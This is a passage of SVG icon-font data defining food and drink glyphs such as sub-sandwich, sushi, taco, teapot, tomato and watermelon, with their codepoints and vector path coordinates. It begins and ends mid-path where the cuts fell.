m25-338c-1 2-2 5-2 7-1 5 0 13 2 18 1 3 3 6 5 9 5 8 14 6 18-3 4-11 4-23-3-34-3-3-8-7-11-6-4 0-7 5-9 9z m14-86c-2 0-6 3-6 6-1 3 3 9 8 13 6 4 13 4 15 2 0-1 1-3 1-4-1-7-11-17-18-17z m25 305c-2-5-3-9-6-14-5-10-14-10-21 0-9 14-9 40 1 54 6 9 15 10 20 0 3-4 4-9 6-14 2-7 2-19 0-26z m22-118c-5 15-3 30 6 43 3 4 9 8 13 7 3-1 7-6 9-11 1-2 1-4 1-6 1-3 1-6 2-6 0-1-1-7-4-13-2-6-5-13-9-18-5-8-14-6-18 4z m28-106c-3-2-6-2-7-1-3 4 0 13 3 20 4 6 8 12 15 17 2 1 5 1 7 0 2-1 2-4 2-6-3-13-9-23-20-30z m53 227c-1-4-2-7-3-10-4-8-12-9-17-2-8 10-8 34 0 44 4 6 11 7 15 0 2-4 3-7 4-11 2-6 3-15 1-21z m38-97c-2-9-7-16-13-22-3-2-7-4-9-3-2 2-4 6-4 9 2 13 6 25 17 34 2 2 6 3 8 2 1 0 2-1 3-3 1-2 1-10-2-17z m6 205c-1-3-3-5-5-6-3-1-9 2-12 5-9 9-12 19-11 30 0 4 3 9 6 11 3 1 8-1 11-4 5-5 9-10 11-17 2-7 1-16 0-19z m22-118c-1-1-4-1-5 0-1 1-2 2-2 3-1 3-2 6-2 8-1 5-1 13 0 18 0 3 1 6 2 9 0 1 1 2 2 2 1 2 4 2 5 1 1-1 2-2 2-3 0-12 1-24 0-35 0-1-1-2-2-3z m-397 326c10-9 21-16 32-24 6-4 6-8-1-9-4-1-7-2-11-3-3-1-6-3-8-5-4-2-5-8-1-11 3-2 5-4 8-5 23-5 46-10 70-12 21-3 43-2 64-1 30 1 59 1 88 5 17 1 34 8 51 13 2 1 3 2 5 4 2 3 2 8-1 10-2 1-4 3-6 3-4 2-8 3-12 3-6 2-6 6 0 10 6 4 11 7 16 11 13 12 27 23 38 36 8 9 4 17-9 18-2 0-5 0-8 0-15-5-31-8-45-14-15-6-29-13-43-20-7-3-11-3-10-1 1 2 1 4 2 5 3 15 8 29 10 44 1 5-2 15-6 16-4 2-12-1-17-5-9-8-17-18-25-28-2-3-4-6-6-9-3-5-6-3-5 4 2 45 12 88 37 127 4 6 3 15-4 18-8 4-16 5-25 4-17-2-24-16-27-29-7-25-12-51-16-77-2-13-2-27-3-41 0-8-3-9-7-3-2 3-4 7-7 10-8 10-17 20-28 28-9 7-16 3-17-8 0-7 0-14 1-20 2-8 4-16 7-23 2-7-2-11-8-8-14 7-27 13-41 18-14 6-29 9-44 12-5 1-13-2-15-5-2-4 0-12 4-15 7-9 15-17 23-23z" />
<glyph glyph-name="sub-sandwich" horiz-adv-x="1000" unicode="&#xeb95;" d="M607 530h0 0z m-249-18h0l1 0c0 0-1 0-1 0z m579-157l0 0c-7 19-23 30-47 32-18 2-33-1-34-1-3-1-6-2-10-4 0 0 0 1 0 1l-57-11c-3 5-7 8-11 11 29 1 50 2 58 2 1-1 1-1 2-1 1 0 2 0 2 0l3 1 2 0-1 1 17 6 0 3c6 107-6 127-7 129 0 0-1 0-1 1l0 0-3 2c-39 15-95 20-166 14-32-3-59-7-77-10 3 0 12 1 14 2 31-7 66-18 110-38 3-1 3-7 2-10 0-1-1-1-1-1 1 3-1 6-4 7-41 19-83 32-121 40-2-1-5-1-7-2-66 11-123 8-165 1-31-4-56-11-76-17 3 0 10 2 12 3 6-1 11-1 16-2 2 0 7-1 9-1 34-4 61-15 85-28 3-1 3-4 2-6 0 0-1 0-1-1 1 2 0 4-2 5-24 13-53 21-87 26-2 0-4 0-6 0-8 1-20 3-29 3-5-2-10-3-15-5-7 0-15 0-22-1-54-3-96-13-96-13l0 0c-46-13-79-38-98-58-21-20-31-38-31-39-1-1-1-2 0-3 0-1 0-3 2-4 5-3 15-5 30-7-11-3-24-8-29-16-3-5-4-10-1-16-7-3-24-12-28-26-2-5-1-11 2-16-1 0-2-1-4-2l0 0 0-1c-1 0-8-13-4-23 1-3 4-5 8-7 0-3 0-7 1-11 1-10 4-23 13-37 16-22 44-37 84-43l50-1h0c1 0 1 0 2 0 1-1 3-2 5-4 8-5 17-7 26-7 9 0 19 2 27 5l1 0 0 1c0 0 0 1 0 1l562-21 1-1 1 1h0c1 0 2 0 3 1l0 0c5 3 11 13 12 68 1 19 0 37 0 49 18-7 25-14 25-15l1-1 1 1c8 1 14 5 18 11 8 15 0 36 0 37 10 1 16 3 17 3 20 3 15 41 15 43z m-87 156c2-13 6-44 2-113l-9-3c-6 50 2 96 7 116z m-17-136c-15-9-31-21-40-28 2 7 2 15-1 21l41 7z m-66 94c6 6 14 6 18 2 5-5 4-13-1-19-6-5-14-6-18-1-5 4-4 13 1 18z m-27-88c10 1 19 1 27 1 6-2 13-6 18-12 0 0-1-1-1-1 1-1 2-2 3-2 3-6 4-14 1-23l0 0v0s0-1-1-2c0-1 0-1-1-1 0-1 0-2 0-3-2-4-5-10-11-18l-4-2c0 0 0 0 0-1-4-1-7-4-8-4l0-1 0 0c0-2-1-3-1-3-1 0-1 0-2 0l-2-1c-1 0-3 0-4 1-7 4-14 5-20 3l-1 0c-18-3-37 3-37 3l-40 11c3 1 7 2 11 3 10-3 41-12 62-14 1 0 5-1 11-1 10 0 22 2 34 11l0 0c1 1 10 13 12 26v0c-1 1-2 21-18 27l0 0c-1 1-31 8-62-16-28-21-54-41-104-32 0 0 0 0 0 0l-17 2 4 2c6-1 58-5 77 8 0 0 42 29 74 39z m-102-81c-8 2-14 1-17-3 0-1-1-2-1-2l-22 2-1 0c-16-8-44 9-44 9l-1 0-1 0c-13-1-18 11-18 12l0 0 0 1-1 0 4 15 97-13c0 0 1 0 1 0 0 0 1 0 1 0l0 0 38-5h1l0 0 21-6c0 0 12-4 27-4 2 0 3 0 5 0-1-1-1-1-2-2-6 0-10-1-12-5 0 0 0 0 0 0l0 0-28-6 0 0-28 2c-5 3-13 4-19 5z m13-8c-3 1-6 1-9 0-7-1-12-5-17-10 0 3 0 7 0 10v1c0 0-1 1 0 1 1 1 3 3 12 2 6-1 11-2 14-4v0z m-32-17c-1-3-2-4-3-5 0 0 0 0 0-1-3-3-7-4-8-5-7 3-17 18-21 26 4 0 8 0 12 2l21-2c1-6 1-11-1-15z m-119 44c-1 1-2 1-2 2 3 1 7 1 10 2 0-1 0-2 0-2 11-19-6-33-8-34-3 1-5 3-6 5 0 3 3 7 4 8l0 0 0 0c4 9 4 15 2 19z m-28 0c0 0-1 0-2 0-1 0-1 1-2 1 19 5 30 12 37 19 0 0 0 0 1 0 0 0 0 0 0 0 6 2 56 18 61 34 0 1 0 2 0 3l8 1c0-1 0-3-1-4-3-10-21-30-102-54z m60 16l-4-12c-4 3-9 4-15 4 7 3 13 6 19 8z m-19-12c6 0 12-2 16-7 2-6 9-15 22-14 1-1 5-3 9-5l-53-10c6 6 15 20 6 36z m205-26c1 2 5 3 9 2l1 0 1 2c0 0 2 4 6 6l3 1c0 0 1 0 1 0 3 1 8-1 12-3l-33-15c-1 3-1 5 0 7z m34 67c-1 0-3 0-3-1-3-5-34-15-70-25 10 6 20 13 30 21 28 20 55 15 58 15 12-5 14-21 14-23-1-10-9-21-10-23-18-14-41-9-41-9l-1 1c-7 0-15 2-24 4l42 2c2 0 3 1 3 2 0 1-2 2-3 2l-56-2c-1 0-1 0-1 0-5 1-10 3-14 4 4 1 9 3 14 4 58 17 61 22 63 24 0 1 0 3-1 4z m-76 73c5 4 11 3 14-1 3-5 1-11-4-14-5-4-11-3-14 1-3 5-1 11 4 14z m-39-59c20 1 39 1 57 2l-58-8c0 2 1 4 1 6z m-3-11h0l86 11c-28-12-55-31-57-32-14-10-48-9-65-8 2 1 4 2 5 2 15 7 25 16 31 27l0 0z m-2 11c-6-34-62-43-62-43l-1 0-17 2c6 1 14 2 22 4 27 7 44 20 51 37 2 0 5 0 7 0z m-52-1c13 0 26 0 39 1-12-28-57-36-76-37 24 12 33 22 36 30 1 2 1 4 1 6z m-19 104c7 2 14-2 15-8 2-6-3-12-11-14-7-1-14 2-15 8-2 7 3 13 11 14z m1-105c0 0 0-1 0-2-1-3-6-10-30-20-9-4-17-7-22-9 4 6 4 11 4 12 1 10-2 14-5 16 0 1-1 2-1 2 18 0 36 1 54 1z m-59-1c0 0 0-1 0-1 1-2 2-3 3-4 2-2 4-4 3-13 0 0 0-6-5-12-6-7-16-15-38-21-1 0-1 0-1 0-2 2-3 4-4 6 19-3 34 11 34 12l1 0 0 0c5 10 6 18 3 25-2 3-4 6-6 8 3 0 6 0 10 0z m-41-1c7 0 14 0 21 1 3-1 9-4 11-10 3-5 2-12-2-20-2-2-16-14-33-10 0 0 0 0 0 0-7 5-13 8-20 7-5 0-9-3-11-4l-1 0-24-1c11 5 22 12 32 20l0 1c0 0 8 6 17 12 3 1 6 3 10 4z m-43-48h-41c5 1 10 3 14 6l30 1c-2-3-3-5-3-7z m12-19c-3-4-4-7-5-9-48-9-70-4-76-3 0 4-2 6-4 9l0 0v11c3 1 8 2 13 4 1 0 1 0 1 0h60c3-6 8-10 11-12z m1 54c-35-28-80-40-90-42 0 3-1 6-2 8l0 2c8 1 37 7 66 25 1 0 22 12 32 20 4 0 8 0 12 0-10-5-17-12-18-13z m-98 12h8c2-6 6-27-7-38v0c-3 1-5 2-5 2l0 1h-1l-1-1c3 5 6 9 7 15 1 1 2 5 2 9 0 3-1 8-3 12z m7-59v-6c0 1-1 1-2 2 1 1 1 2 2 4l0 0z m87 130c7 2 14-2 16-9s-4-13-12-14c-7-2-15 2-16 9-1 6 4 12 12 14z m2-70c-11-7-26-16-26-16-27-16-54-22-64-24 3 2 5 5 6 9 5 1 51 14 68 31 5 0 11 0 16 0z m-23 0c-17-13-49-23-60-26 1 4 2 8 2 12-1 5-1 10-2 13 19 0 39 0 60 1z m-73 96c7 0 14-5 14-12 0-6-7-11-14-11-7 0-14 5-14 11 0 7 7 12 14 12z m-111-25c12 0 20-8 20-17 0-9-9-17-20-17-11 0-19 8-19 17-1 9 8 17 19 17z m-116-51c0 0-1 1-1 1 5 7 22 33 52 56-30-24-46-49-51-57z m-33-71c4 14 28 23 28 23l2 1-1 3c-3 5-3 9-1 13 4 6 13 11 28 14 6 1 12 2 17 2 15-1 33-2 54-3-8-10-13-18-13-18-21-25-51-32-52-32-1-1-2-2-1-3 0-1 1-2 2-2 0 0 0 0 0 0 2 0 33 8 55 34 0 1 6 9 15 21 33-2 74-3 121-3 7-9 3-18 3-19l-1 0 0 0c-5-22-29-30-32-31-25 3-33 10-33 10l-1 1 0 0c-8 2-19 3-29 2 1 2 1 4 1 6-1 4-6 8-9 10 11 7 35 20 61 15 1-1 2 0 3 1 0 2-1 3-2 3-37 9-71-19-72-21l0 0c-7-7-15-13-24-17h0c0 0-1-1-1-1-6-3-12-5-17-6 2 1 5 2 7 4 19 12 32 27 36 42 1 1 0 3-1 3-2 0-3 0-3-2-10-32-54-49-60-52-18-2-32-3-33-4l-2 0-1 0c-5 2-10-5-12-8-4-2-8-5-12-9-2 3-6 8-12 9-2 1-4 1-6 0-3 5-3 9-2 14z m202-13c0 1-2 1-3 1-1 0-2-2-1-3 0 0 4-14 1-29 0 0 0 0 0-1-5-12-26-7-26-7-2 1-3 0-3-1s0-3 2-3c0 0 5-1 11-1h1c-9-17-22-20-27-20-2 22-8 36-16 41l31 9 1 1c9 11 10 20 10 24 7 0 28-3 35-24l0 0c0-3 0-6 1-7-4-12-13-21-20-28 11 22 3 47 3 48z m-40-12l-31-9-12 14 43-5z m-47 11c0 0-1 0-1 0l0 0h-1c-2 0-3-2-5-3 0 0 0 1-1 2l-1 1v1c-2-1-6-7-10-16-16 1-28-1-35-4h0l-11-2v25c4 0 15 2 29 3h0l1 0c0 0 0 0 0 0l1 0c7 1 16 2 24 3 50 4 67 2 73 0-1-6-5-14-8-18 0 0-1 0-1 1l-54 7z m20-25v0c1 0 2 0 3-1 4-2 10-9 14-32-9 0-15 1-18 6-7 9 1 27 1 27z m45 42l-2-1 0-1c-12 3-40 2-67 0 3 1 7 3 10 4 7 1 48 7 67 2 2-2 12-9 36-11h0l0 0c1 0 9 2 18 8-2-3-3-6-3-8-9-2-15-6-18-12 0 0-1-1-1-2-11 22-39 21-40 21z m-48 8c5 4 10 8 14 13 0 0 1 0 2 1 3-1 9-4 9-7 1-2-1-4-3-5-8 0-16-1-22-2z m-138-50c-2 6 1 15 3 18 4 2 7 3 10 2 5-1 8-5 10-7-8-7-15-15-17-18-3 1-5 3-6 5z m59-5h-47l0 0c6 7 18 20 29 25l1 1 0 0c3 4 6 8 7 8 0 0 1-1 2-7v-20l0-1c0 0 0 0 0-1 0-1 1-2 2-2h1l6 1c-1-2-1-3-1-4z m5 0s0 1 1 3c1 0 3 0 4-1 1 0 2-1 2-2h-7c0 0 0 0 0 0z m6-5h1c1 0 2 0 2 1 2-3 5-6 10-9-5 1-9 4-13 8z m24 1c-1-4-2-6-4-8-5 2-11 7-14 12-1 3-2 5-4 6-1 1-1 1-1 1 5 2 14 4 29 4-2-5-4-10-6-15z m48-85c-2 3-3 6-3 6l-1 0v1c0 2-5 6-9 9-11 3-23 15-24 16l0 0 0 0c-9 21 0 31 3 34-1 17 1 28 2 35 3 7 7 12 9 13v-1l1-1c1-1 1-3 0-6-1-1-6-11-5-43-4-3-12-13-4-32l0 0 1-1c0 0 12-12 23-15 5-2 10-6 10-8v-1l0 0c0 0 1-3 3-7l-6 1z m66-9c-44-15-57 13-59 17 0 5-10 11-12 12l0 0 0 0c-9 2-20 12-21 14-9 19 2 26 2 26l2 1v1c-2 33 4 42 4 42l0 1c1 0 1 1 1 1l11-13h0c-2-5-6-20 1-29 3-5 10-8 19-8 1 0 2 0 3 0l0-2 0-2 2 0c0 0 1 0 2 0 2 0 7 0 12 2 6 2 15 8 21 22 3 1 5 2 7 3-2-6-6-12-12-17-21-14-30-25-29-34 2-8 11-10 11-10l1 0 0 0c3 1 4 0 4 0 0 0 0-1 0-2-2-4-3-8-2-11 2-4 9-5 9-5 16-1 21-5 23-7 0-1 0-2 0-2z m43 61h0l-1 1c0 0-8 3-11 12-1 6 0 12 4 19 0 1 1 1 1 1 0 1 1 1 1 1 0 0 4 3 7 9l1 0s0 1 0 1h1c1 1 1 2 1 3l0 1c1 1 1 3 2 6 1 0 1-1 2-1 1-1 3-2 4-3 0 0-1 0-1-1-3-13-12-18-12-19 0 0-1 0-1-1 0 0-1 0-1-1-4-6-5-13-4-18 2-5 5-8 8-10h-1z m14-30l-1 0 0 1c-1 1-10 11-10 20 0 3 1 5 4 7 0 0 0 0-1 0 4 0 5-1 5-1 0 0 0-1 0-1-2-2-3-4-3-7 0-8 9-18 10-19l0 0 1 0c5-3 10-5 14-5-5 0-12 1-19 5z m112 86l0-2c0 0-1 0-1-1l1 0c-1 0-1-1-1-1l0-1 0 0c-1-1-4-4-5-9-1-3-2-8 1-12 0-1 1-2 0-5-1-2-2-4-3-6-2-2-4-3-8-6l-5 20c0 1-2 2-3 1-1 0-2-1-2-3l6-21c0-1 1-1 1-1-1-2-2-3-5-5-2 0-6-2-9-6l-10 25c-1 1-2 2-3 2-1-1-2-2-1-4l12-30c0 0 0-1 1-1v-1c0 0-1-3-3-6-3-3-9-6-23-5-2 0-10 0-15-1l13 30c0 1 0 2-2 3-1 0-2 0-3-1l-14-34c0 0 0 0 0-1l0 0c0-1-1-3-3-4-3-1-9-2-21 4-3 3-8 10-8 15 0 2 1 3 2 4l1 0 0 1c0 0 1 3-1 5-1 3-5 4-9 4-2 1-6 3-8 8-1 4 0 9 3 15l0 0 1 0c0 0 10 7 14 22 0 0 0 1 0 1 0 0 0 0 1 1 0 0 0 0 0 0l0 0 0 1c0 0 0 0 0 1 0 0 0 0 0 0l-1 1c-1 1-3 2-4 3-4 3-6 6-6 9-1 7 5 14 7 16l1 1c1 1 1 3 0 4-1 0-3 0-3-1l-1-1c-3-2-10-10-9-20 0-1 1-3 1-4 0 0-1 0-1-1-3 2-4 2-4 2 0-1 0-3 1-5-1-2-1-4 0-7 0 0 0 0 0 0h-1c0 0 0-1 0-1-19-15-26-28-30-35-3-8-2-13-2-13l0-1 0 0-7-53c-5 3-12 6-23 7-1 0-5 0-6 2 0 2 0 4 2 7l1 1 0 0c0 0 0 4-2 7-2 1-4 2-8 1-1 0-6 2-6 6-1 4 2 12 27 29 1 1 27 16 36 41l0 1 0 0c0 0-3 8 1 15 3 5 8 8 16 10l2 0 0 2c1 4 5 15 12 16 1-1 5-3 7-7 2-5 1-10-2-16l-1-2 2-1c0 0 10-6 11-14l0-2 1 0c1 0 23-9 81 2l1 0 1 2c2 5 8 16 13 16 0 0 1-1 2-2 1-2 1-5 0-11z m52-73c-4 4-4 10-4 12-10 9-16 17-16 24 0 5 2 9 4 10-1 6-3 11-6 15 3-3 9-10 9-18-1-2-3-5-3-10 0-7 5-15 15-23 0-2 0-8 4-11 2-1 3-1 5-2-3 1-6 1-8 3z m38-5l-1 0-1 1c-2 4-3 7-5 9 1 0 1 1 2 1 1-2 4-6 6-11l1-1-2 1z m39 8c3 5 7 12 7 21v0c0 0 1 4 3 7 1 1 3 1 5 1 1-1 3-3 6-5-6-12-14-20-21-24z m70 56l-1 0c-1 0-2-1-3-1-1 0-2-1-3-1-11-5-15-15-15-16l0 0v0c0-4-5-9-7-10-15-8-23 4-23 5l-1 1-1 0c-4 0-7-1-9-3-4-3-4-9-4-10-2-13-11-24-11-24 0 0 0-1 0-1-12-4-23-2-26-1-4 7-7 11-7 11l-1 1-1 0c-6 2-14-6-16-8-4-1-9-2-12 0-3 3-2 9-2 9l0 2-1 0c-12 9-14 16-15 20 0 4 3 7 3 7l1 0v2c0 13-11 24-13 25-3 4-10 6-17 6-3 0-6 0-9 0 1 6 1 10-1 13-2 4-5 5-5 5l0 0h-1c-3 0-7-3-9-6-4 3-11 8-11 14 0 3 2 5 6 8l0 0 0 0s4 5 11 5c5 1 10-1 16-6 0-3 4-13 12-16 1-1 2-1 4-2l0 0h0c3 0 6 0 9 2l1 0c0 0 3 2 9 4 0-1 0-1 0-1 0 0 3 0 5-2 1-3 1-7-2-13-1-1-5-6-4-11 0-5 4-8 10-11l1 0 68 12 0 0c4-1 8-2 13-3 0 0 0 0 0-1 1-2 14-26 25-30l1 0h0c0 0 7 1 13 7 1 2 2 4 3 6 3 5 10 14 19 15 6 1 11 0 17-4-6 2-11 2-16 1z m17-22l0-1-4-1 2 5c3 5 3 9 2 12 2-2 4-7 0-15z m20 27c-4-4-7-6-10-6-5 1-7 6-8 7l18-1z m16-43c-9 0-15 15-17 20l-1 3-12-4c3 9-2 15-3 16 2-1 4-2 6-2 5-1 11 2 17 10l25 5c0-8 7-18 9-21-2-23-22-26-24-27z m28 32l0-2c-2 2-3 5-5 7 1 0 1 1 2 1 1-2 2-3 2-5l1 0 0-1z m49 14c-1 0-2-1-2-2-3 1-8 3-14 3 0 0-1 0-1 0-5 1-12 1-20-1l-1 0 23 11c2 0 3 0 4 1 2 1 4 3 4 6 2 1 5 3 8 3 1 0 2-1 4-3 0-2 1-10-5-18z m67-127c0 1 0 2-1 4 1-1 1-3 1-4z m6 6c-4 20-14 71-10 111 2 0 5-1 7-2-2-34 2-75 5-99 0-4-1-7-2-10z m-68 121c7 10 4 19 4 20l0 0 0 0c-2 2-3 4-5 5l0 0 1 0 90-7 0 0 1 0 1-19h-16l-76 1z m121-17c-3-5-7-8-13-9-3 2-11 9-28 15l0 5h17l-1 23c6 0 11-1 16-1 3 0 6 0 9 0 0 0 0-1 0-1 0 0 7-20 0-32z m21 42l0-1c0 0-21-5-46-2v1l-93 7c6 8 8 13 10 17 9 7 46 38 65 42 1 0 60 13 75-27 1-10 2-36-11-37z m-23 60l0 0c-7 2-13 2-20 2-26 0-40-11-41-12l-53-45 123-4 1 0c23 10 20 28 19 31-1 18-28 28-29 28z m8-54l-109 4 18 16 1-1c0 0 0 0 0 1 24 6 63 13 70 2 0-1 2-2 3-1 1 1 1 2 1 3-9 15-48 7-67 2l17 14c0 1 14 12 38 12 6 0 12-1 19-2 1-1 25-10 25-25l0 0c1-1 5-17-16-25z" />
<glyph glyph-name="sushi" horiz-adv-x="1000" unicode="&#xeb96;" d="M761 20c-9 15-16 32-25 47-49 76-117 128-203 158-56 20-114 29-173 16-74-15-127-59-164-123-3-5-7-12-1-17s12-2 18 0c11 4 23 8 35 11 0-4 0-6 0-8-3-25-2-49 2-73 5-25 22-41 46-44 35-5 70-8 105-14 49-8 98-21 144-39 28-11 57-20 88-21 21-1 39 5 49 24 6 12 13 15 26 13 29-4 55 9 84 12-2 3-3 5-5 7-9 17-18 34-26 51z m-47 58c1 0 2-1 2-1 6-8 11-15 16-23-61 40-125 40-192 16 14 11 30 18 47 23 44 12 86 5 127-15z m-61 67c2 0 4-1 5-2 6-5 12-10 19-17-69 26-133 15-194-21 21 21 45 34 74 41 32 8 64 7 96-1z m-88 53c14-2 25-8 37-15-71 14-132-4-183-56l-1 1c6 8 11 16 18 23 35 36 79 50 129 47z m-44 22c-72 0-128-27-170-84 7 21 19 38 35 52 25 22 55 33 87 39 16 3 31-1 48-7z m-157 7c23 12 32 17 70 11-63-12-106-49-141-98 0 1 0 1 0 2 15 35 37 66 71 85z m-121-94c6 34 39 80 75 87-13-12-29-25-42-40-13-15-23-32-33-47z m390-208c-29 2-56 10-83 20-48 19-97 32-147 40-35 6-71 10-106 14-17 2-30 14-34 32-6 27-6 55-1 83 54 8 106 4 156-15 52-20 98-48 141-82 35-28 73-50 117-62 0 0 1 0 1 0-7-21-23-32-44-30z m44 95c-30 8-61 10-92 6l0 2c12 3 25 6 37 7 43 5 84-4 122-23 7-3 10-9 14-15l6-10c-28 14-57 26-87 33z m193 713c-12 11-14 11-28 0l-455-355c-49-39-98-77-147-116 6-14 12-16 25-7 199 144 399 288 599 432 5 4 10 8 13 13 8 12 5 23-7 33z m-214 17c5 6 6 11 2 19-14 23-33 25-51 4-27-32-55-64-83-96l-399-463c-10-11-9-17 6-26 2 3 4 6 7 9 127 136 254 272 381 407 45 49 91 98 137 146z" />
<glyph glyph-name="taco" horiz-adv-x="1000" unicode="&#xeb97;" d="M533 530c-275 35-433-181-452-381-5-46 9-57 54-57h347l353 0c38 0 49 11 50 49 1 187-156 364-352 389z m-131-361c-23 0-42 18-42 41s19 42 42 42 42-19 42-42c0-23-19-41-42-41z m78 114c0 26 21 47 48 47s47-21 47-47-21-48-47-48-48 21-48 48z m115-143c-21 0-37 17-37 37 0 20 16 37 37 37 20 0 36-17 36-37 0-20-16-37-36-37z m71 142c-13 0-24 11-24 23 0 13 11 24 24 24s23-11 23-24c0-12-10-23-23-23z m71-137c-24 0-43 19-43 43 0 23 19 43 43 43 24 0 43-20 43-43 0-24-19-43-43-43z m-427 388c-36 15-75 31-107 8-32-24-28-64-26-101 44 31 87 61 133 93z m401 40c-34 21-70 2-105-17 48-28 94-54 140-81-1 37-1 78-35 98z m225-348c-5 23-22 28-41 33 8-30 16-59 24-92 18 18 21 37 17 59z m-138 200c27-43 53-84 83-130 19 37 13 68-4 99-18 32-48 32-79 31z m-656-34z m0 0c-22 19-43 30-68 9-20-18-14-50 19-91 17 28 33 55 49 82z m387 182c-20 12-40 34-61 35-33 3-56-24-76-52 46 2 88 5 131 8l6 9z" />
<glyph glyph-name="tea-pot" horiz-adv-x="1000" unicode="&#xeb98;" d="M575 620c-5 24-26 42-51 42s-46-18-51-42c-64-14-118-55-151-110h404c-32 55-87 96-151 110z m-51-13c-10 0-18 9-18 19 0 10 8 18 18 18 11 0 19-8 19-18 0-10-8-19-19-19z m400-163c-11 28-29 46-55 54-40 12-87-6-118-21-2 2-5 5-8 7h-440c-53-41-86-98-90-160-2 6-3 12-4 18-3 10-4 20-5 31l-1 8-1 9c-1 7-2 14-5 21-4 14-11 28-22 38-10 11-23 18-34 20-54 10-64-37-64-37s66 11 64-35c1-3 1-7 0-10l-1-16c0-12 0-25 1-38 2-25 6-52 18-77 11-25 29-47 50-61 20-14 40-20 55-23 3-1 7-1 10-2 31-33 71-59 110-73h276c52 19 95 50 126 88 119 90 180 154 138 259z m-105-202c9 23 14 46 14 71 0 55-23 106-62 146 26 13 63 24 92 15 18-5 30-18 39-39 30-74 3-122-83-193z m-172-159h-246c-8 0-14-7-14-15v-15c0-8 6-15 14-15h246c8 0 15 7 15 15v15c0 8-7 15-15 15z m-566 423c0 4 2 6 6 10 4 4 10 10 9 20-1 11-8 15-13 19-5 3-7 4-7 8-1 4 1 6 5 10 4 5 10 10 9 21-1 3-4 6-7 5-4 0-6-3-6-7 0-4-2-6-5-10-5-4-10-10-9-20 1-10 8-15 13-18 4-3 7-5 7-9 0-4-2-6-5-10-5-4-10-10-9-20 0-4 3-6 7-6 3 0 6 4 5 7z m37 42c5-3 7-4 8-8 0-4-2-6-6-10-4-5-10-11-9-21 1-3 4-6 8-6 3 1 6 4 5 7 0 4 2 6 6 10 4 5 10 11 9 21-2 10-8 15-13 18-5 3-7 5-8 9 0 3 2 6 6 10 4 4 10 10 9 20-1 3-4 6-7 6-4-1-7-4-6-7 0-4-2-6-5-10-5-5-10-11-9-21 1-10 7-14 12-18z" />
<glyph glyph-name="tea" horiz-adv-x="1000" unicode="&#xeb99;" d="M915-30h-294v18c41 0 87 56 114 105 81 11 198 107 199 217 1 41-17 63-31 73-29 22-68 17-97 10 1 23 1 43 0 59h-345c-29 0-183 0-285 0-6-107 35-451 191-464v-18h-282c-11 0-19-9-19-20v-18c0-11 8-20 19-20h830c11 0 20 9 20 20v18c-1 11-9 20-20 20z m-113 361c34 10 56 12 66 5 6-5 7-16 7-25 0-61-58-119-107-145 18 54 28 112 34 165z m-512-205c-34 78-58 290-58 290s69-191 84-244c16-52 84-127 84-127s-76 2-110 81z m156 397c1-1 2-1 2-1 3 0 5 2 5 5 0 0 0 1-1 1-10 45-5 81 16 108 19 26 28 59 23 89-5 26-18 47-40 62-2 1-4 1-5 0s-3-3-2-5c11-46 1-77-23-120-14-24-19-50-16-75 4-27 18-49 41-64z m112 0c0-1 1-1 2-1 2 0 3 2 3 4 0 0 0 1 0 1-8 37-4 66 12 89 16 21 23 48 19 72-3 21-15 38-32 50-2 1-3 1-4 0-2-1-2-2-2-4 9-38 1-63-19-98-11-19-15-41-12-60 3-23 14-41 33-53z" />
<glyph glyph-name="tomato" horiz-adv-x="1000" unicode="&#xeb9a;" d="M925 392c-30 106-101 177-196 228-3 1-6 2-9 2-37-1-74-1-111-3-13 0-26-2-37-12 1-2 3-4 4-6 15-24 32-47 46-72 8-14 14-30 18-46 4-17-4-24-21-23-3 0-5 1-8 2-26 6-46 22-66 38-25 21-48 42-73 63-15 13-20 13-37 2-13-10-25-22-38-33-24-19-47-40-72-58-8-7-21-7-32-10-7-2-9 2-11 8-5 29 3 54 16 79 11 21 26 39 49 53-6-1-8-1-11-1-29-6-59-11-89-7-10 1-18-1-26-7-34-24-64-51-89-84-72-98-90-204-44-318 38-94 110-158 201-201 58-27 119-42 180-45 2-5 15-8 31-8 17 0 31 4 31 8 24 2 48 5 73 10 100 21 187 66 254 146 72 86 98 186 67 295z m-544-356c-38-2-71 11-103 31-70 46-81 124-74 171 4-10 8-19 12-28 13-31 28-60 49-86 27-33 62-53 102-62 26-7 51-8 77-6l4 0c-21-12-43-18-67-20z m-16 588c11 1 13-4 8-13-7-10-15-20-23-29-17-22-35-44-44-71-3-7-3-15-5-23 7 4 11 7 16 11 31 25 61 51 92 75 13 9 28 14 42 21 6 3 12 1 18-4 37-35 75-68 120-93 10-6 20-10 30-15 1 5 0 8-1 11-9 23-24 41-41 58-10 11-21 23-23 38-4 29-3 33 22 40 19 5 39 7 58 9 19 1 39 0 58 0-55 28-115 33-175 34-1 20-2 40-6 60-1 9-6 18-10 27-5 8-13 8-22 5-8-3-13-6-12-17 2-25-5-48-21-68-5-6-14-10-22-12-13-3-27-4-41-6-49-5-89-29-131-53 18 1 36 3 53 6 20 3 40 6 60 9z" />
<glyph glyph-name="watermelon" horiz-adv-x="1000" unicode="&#xeb9b;" d="M263 320c104-96 225-122 357-73 131 49 204 148 221 288 1 10 2 19 2 29 0 3-2 6-5 6h-676c-3 0-5-3-5-6 3-95 35-179 106-244z m439 162c19 3 36 3 51-7 8-5 15-12 11-22-4-10-13-9-23-7-18 4-30 16-41 31-2 2-1 5 2 5z m-45-67c19-5 35-12 44-28 4-5 5-17 2-22-6-9-16-5-24 0-15 11-22 26-27 46 0 3 1 5 5 4z m-48 105c1 2 4 3 7 2 8-2 15-4 22-7 2 0 4-6 3-9 0-2-6-5-8-4-7 3-14 7-21 11-2 1-4 4-3 7z m-26-36c2 1 5 1 8-1 6-5 12-9 18-14 1-1 1-3 1-5 0-3-3-6-6-6-3 0-5-1-6 1-5 5-9 11-14 17-2 3-2 6-1 8z m-3-120c2 0 5-1 8-3 12-10 23-20 27-36 3-10 6-21-6-26-13-6-21 4-24 14-4 14-5 29-7 44-1 3 0 6 2 7z m-35 91c2 1 4-1 7-3 3-4 7-8 8-12 2-4 1-7 0-11-1-4-4-5-6-3-4 2-7 4-9 7-2 5-2 10-2 16 0 3 1 6 2 6z m-50-12c1 3 3 6 5 6s3-2 4-6c2-5 4-11 4-17 0-3-2-5-4-8-2-3-5-3-7-1-3 3-5 6-5 9 0 6 2 11 3 17z m2-93c2 2 4 2 6 0 10-18 18-34 12-53-1-5-6-9-11-13-2-2-6-2-8 0-5 4-9 8-11 13-6 19 3 35 12 53z m-60 86c3 6 7 11 11 17 2 2 5 4 7 3 1-1 2-4 1-7-1-7-1-13-4-19-1-2-4-4-7-5-3-1-6 1-7 4-1 2-2 5-1 7z m-26-128c-5-7-12-14-22-10-10 